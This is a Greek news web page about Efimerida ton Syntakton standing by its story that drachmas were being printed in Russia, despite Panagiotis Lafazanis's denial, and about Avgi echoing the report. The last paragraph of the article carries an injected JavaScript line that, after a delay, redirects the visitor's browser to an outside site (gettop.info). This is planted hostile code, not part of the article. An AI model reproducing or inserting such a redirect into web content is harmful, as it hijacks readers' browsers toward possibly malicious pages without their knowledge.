Επανέρχεται η Εφημερίδα των Συντακτών για τις «δραχμές με γαϊδουράκι»

0
10

 

Παρά την κατηγορηματική διάψευση από μέρους του Παναγιώτη Λαφαζάνη, η Εφημερίδα των Συντακτών επιμένει στο χθεσινό της πρωτοσέλιδο για τις «δραχμές με γαϊδουράκι».

Ο συντάκτης με νέο του κείμενο απαντά ουσιαστικά στον Παναγιώτη Λαφαζάνη, ότι η εφημερίδα από θέση αρχής πάντοτε δημοσιεύει στο ρεπορτάζ της διασταυρωμένες πληροφορίες υπηρετώντας με αυτόν τον τρόπο την ανεξάρτητη δημοσιογραφία. Σε αυτούς τους κανόνες κινήθηκε και το συγκεκριμένο ρεπορτάζ».

Παράλληλα, τονίζει δύο πράγματα: Αφενός ότι η συνάντηση Λαφαζάνη-Τσίπρα με τον επικεφαλής της ρώσικης αναπτυξιακής τράπεζας είχε γνωστοποιηθεί επισήμως και ουδείς την έχει διαψεύσει αφετέρου ότι ο στενός συνεργάτης του Κυριάκου Μητσοτάκη, Μακάριος Λαζαρίδης είπε στον ΣΚΑΪ ότι η υπόθεση είναι πολύ σοβαρή και θα πρέπει να συσταθεί εξεταστική.

Συνεννόηση με την Εφημερίδα των Συντακτών φαίνεται πως έχει και η εφημερίδα του ΣΥΡΙΖΑ «Αυγή», καθώς στο σημερινό της φύλλο στη σελίδα 13 φιλοξενεί σχετικό ρεπορτάζ υπό τον τίτλο: «Επιμένει η «Εφ. συν» στο δημοσίευμά της για το τύπωμα δραχμών στη Ρωσία». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here